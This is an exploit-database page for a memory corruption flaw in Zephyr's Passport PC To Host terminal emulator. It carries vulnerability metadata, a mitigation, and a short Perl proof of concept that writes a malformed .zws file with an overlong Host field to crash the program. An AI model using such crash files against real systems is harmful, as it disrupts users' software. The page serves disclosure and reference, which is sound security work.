header-logo
Suggest Exploit
vendor:
Passport PC To Host
by:
Silent Dream
7,5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Passport PC To Host
Affected Version From: 2011-506-S
Affected Version To: 2011-506-S
Patch Exists: YES
Related CWE: N/A
CPE: //a:zephyrcorp:passport_pc_to_host:2011-506-s
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2012

Passport PC To Host Malformed .zws file Memory Corruption

A specially crafted .zws file can cause a memory corruption in Passport PC To Host, a terminal emulation software by Zephyr Corporation. The file contains a header of '[Connection]Host=' followed by 150 'a' characters. When the file is opened, the memory corruption occurs.

Mitigation:

Update to the latest version of Passport PC To Host.
Source

Exploit-DB raw data:

# Exploit Title: Passport PC To Host Malformed .zws file Memory Corruption
# Date: 3-3-12
# Author: Silent Dream
# Software Link: http://www.zephyrcorp.com/terminal-emulation/
# Version: Latest (2011-506-S)
# Tested on: Windows XP SP3

my $file = "passport_pwn.zws";
my $head = "[Connection]\nHost=";
my $junk = "a" x 150;
open($File, ">$file");
print $File $head.$junk;
close($FILE);

Navigation

Suggest Exploit

Services By CQR